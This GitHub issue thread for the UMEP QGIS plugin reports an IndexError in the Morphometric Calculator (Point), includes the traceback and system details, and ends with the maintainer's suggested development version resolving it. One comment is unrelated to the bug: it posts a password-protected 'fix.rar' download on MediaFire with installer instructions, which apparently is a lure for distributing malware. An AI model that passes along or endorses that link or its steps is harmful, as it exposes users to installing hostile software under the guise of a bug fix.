### ISSUE TITLE
Error when running Urban Morphology: Morphometric Calculator (Point)

### ISSUE THREAD

**Issue by 030Skript** [UMEP-dev/UMEP#639]
Hello together,

**Describe the bug**
 Problem encountered when try to run the Urban Morphology: Morphometric Calculator (Point) same issue like here: https://github.com/UMEP-dev/UMEP/issues/540 

**To Reproduce**

    Go to 'Urban Morphology: Morphometric Calculator (Point)'
    Choose point of interest
    Search distance: 200m, Wind direction search interval (degree): 5
    Select raster layers of DSM and DEM
    Select Kanda et al. (2013) Method
    Add prefix, select saving directory and run the plugin

    Error message appears: 2024-08-27T16:17:29    "CRITICAL    Traceback (most recent call last):
              File "C:\Users/User/AppData/Roaming/QGIS/QGIS3\profiles\default/python/plugins\processing_umep\preprocessor\imagemorphparmspoint_algorithm.py", line 247, in processAlgorithm
              immorphresult = morph.imagemorphparam_v2(dsm, dem, scale, 1, degree, feedback, 1)
              File "C:\Users/User/AppData/Roaming/QGIS/QGIS3\profiles\default/python/plugins\processing_umep\util\imageMorphometricParms_v2.py", line 100, in imagemorphparam_v2
              lineMid = a[0:imidy,imid]
             IndexError: only integers, slices (`:`), ellipsis (`...`), numpy.newaxis (`None`) and integer or boolean arrays are valid indices"
             
**Desktop (please complete the following information):**
 - OS: Windows 10 Pro
 - QGIS Version 3.34.4
 - UMEP Version 4.0.4
 - SuPy Version 2022.4.7 supy_driver: 2021a5

**Data**
https://tubcloud.tu-berlin.de/s/D6KtkbSS7TGjLfJ  

DSM (Veg+Build), 
DEM (Ground)
related Fluxtower

**Additional context**

I checked extent, resolution, dims, everything seemed to be fine. Also reprojected the data twice (EPSG: 4326/25833) but still encountering this issue. Especially strange because I used the same data in SUEWS Prepare and it worked perfectly fine. Basicly looking for Z0 for the FFP (I wasn't sure how to use the files/combine the values for Z0 created in SUEWS Prepare for build/veg as this is not my main topic). 

Thank you in advance, I really appreciate your work! :)

**Comment by akshsekhr2702** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by biglimp** [comment]
I might actually fixed this before but didnt submit to the repository. Try development version 2.0.30 and report back this fixed your issue.

**Comment by 030Skript** [comment]
No more errors, so it seems to be working. Thank you very much 👍
